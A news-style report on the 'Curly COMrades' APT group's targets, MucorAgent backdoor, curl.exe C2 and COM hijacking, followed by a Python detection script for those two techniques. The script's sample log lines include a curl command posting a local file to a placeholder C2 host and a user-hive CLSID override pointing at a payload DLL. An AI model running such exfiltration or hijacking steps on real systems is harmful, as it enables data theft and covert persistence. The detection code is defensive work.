Criminal elements are reportedly employing covert malware to infiltrate government systems
Curly COMrades, a newly identified advanced persistent threat (APT) group, has been actively targeting critical organizations in geopolitically sensitive regions such as Georgia and Moldova since mid-2024. Their primary focus has been on government and judicial entities, as well as energy companies.
The suspected connection to Russia stems from their alignment with Russian geopolitical interests. Although definitive links to any known Russian threat actors have not been established, their tactics, targets, and operational goals notably support Russian strategic objectives.
Technically, the group is distinguished by its heavy use of the curl.exe utility for command-and-control (C2) communication and by its hijacking of Component Object Model (COM) objects. It employs a mix of built-in or publicly available tools (living-off-the-land binaries, LOLBins), open-source projects, and custom malware such as the MucorAgent backdoor to achieve stealth, persistence, and lateral movement across networks with minimal detection.
MucorAgent is a three-stage .NET backdoor for Windows: it runs commands covertly, keeps them encrypted to evade detection, and sends the results back to the attackers.
The group's exposure was first reported by Bitdefender Labs and corroborated by other cybersecurity sources, who emphasize their role in supporting Russian state objectives through cyber espionage in critical regions experiencing geopolitical shifts.
Key Aspects of Curly COMrades
- Who they are: A new advanced persistent threat actor targeting geopolitical hotbeds since mid-2024.
- Primary targets: Government, judicial bodies, energy firms in Georgia and Moldova.
- Techniques: Credential theft (NTDS and LSASS dumps), COM hijacking, curl.exe use for C2, proxy relays, custom malware (MucorAgent).
- Connection to Russia: Aligned with Russian geopolitical goals; suspected support of Russian interests but low-confidence direct attribution.
- Operational goals: Long-term network access, data exfiltration, network control.
Curly COMrades' operations may align with the geopolitical goals of the Russian Federation, but there are no strong overlaps with known Russian APT groups. This data is current as of August 2025, reflecting ongoing monitoring and analysis in cybersecurity communities.
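Detection logic for two of the techniques listed above, curl.exe launched for C2 and COM hijacking through a user-hive CLSID override, written as an added example that is not part of the report or of any vendor's tooling. The Sysmon-style log lines, the CLSID, the SID and the hostnames are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation (EventID 1) and registry-value-set
# (EventID 13) lines; illustrative only, not telemetry from the campaign.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\curl.exe ParentImage=C:\Windows\System32\cmd.exe '
    r'CommandLine="curl.exe -s -X POST http://c2.placeholder.invalid/up -d @C:\Users\Public\out.txt"',
    r'EventID=1 Image=C:\Windows\System32\curl.exe ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="curl.exe -O https://example.com/file.zip"',
    r'EventID=13 Image=C:\Windows\System32\rundll32.exe TargetObject=HKU\S-1-5-21-PLACEHOLDER'
    r'\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default) '
    r'Details=C:\Users\Public\payload.dll',
    r'EventID=13 Image="C:\Program Files\Vendor\setup.exe" TargetObject=HKLM\SOFTWARE\Classes'
    r'\CLSID\{22222222-2222-3333-4444-555555555555}\InprocServer32\(Default) '
    r'Details="C:\Program Files\Vendor\lib.dll"',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')          # key=value, value may be quoted
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                 "cscript.exe", "mshta.exe", "rundll32.exe"}
# curl options that send a body or file to the server (documented curl flags)
UPLOAD_FLAGS = re.compile(r'(^|\s)(-d|--data(-binary|-raw)?|-T|--upload-file|-F|--form|-X\s+POST)(\s|$)')
# HKCU\Software\Classes\CLSID\{GUID}\InprocServer32 overrides the HKLM entry (COM hijacking)
COM_INPROC = re.compile(r'\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32', re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

def parse(line):
    return {k: v.strip('"') for k, v in KV.findall(line)}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_curl_c2(ev):
    """Flag curl.exe spawned by a shell/script host or sending data outbound."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) != "curl.exe":
        return None
    parent, cmd, reasons = basename(ev.get("ParentImage", "")), ev.get("CommandLine", ""), []
    if parent in SHELL_PARENTS:
        reasons.append(f"spawned by {parent}")
    if UPLOAD_FLAGS.search(cmd):
        reasons.append("uploads data")
    return ("curl_c2", "; ".join(reasons)) if reasons else None

def check_com_hijack(ev):
    """Flag a user-hive InprocServer32 pointing at a DLL outside trusted directories."""
    target = ev.get("TargetObject", "")
    if ev.get("EventID") != "13" or not target.upper().startswith(("HKU\\", "HKCU\\")):
        return None
    dll = ev.get("Details", "").lower()
    if not COM_INPROC.search(target) or dll.startswith(TRUSTED_DIRS):
        return None
    return ("com_hijack", f"user-hive InprocServer32 -> {dll}")

def analyze(lines):
    findings = []
    for ev in map(parse, lines):
        findings += [hit for hit in (check_curl_c2(ev), check_com_hijack(ev)) if hit]
    return findings
```

On the sample lines the benign explorer-launched download and the HKLM write by a vendor installer are ignored, while the shell-spawned POST and the per-user CLSID override are both reported.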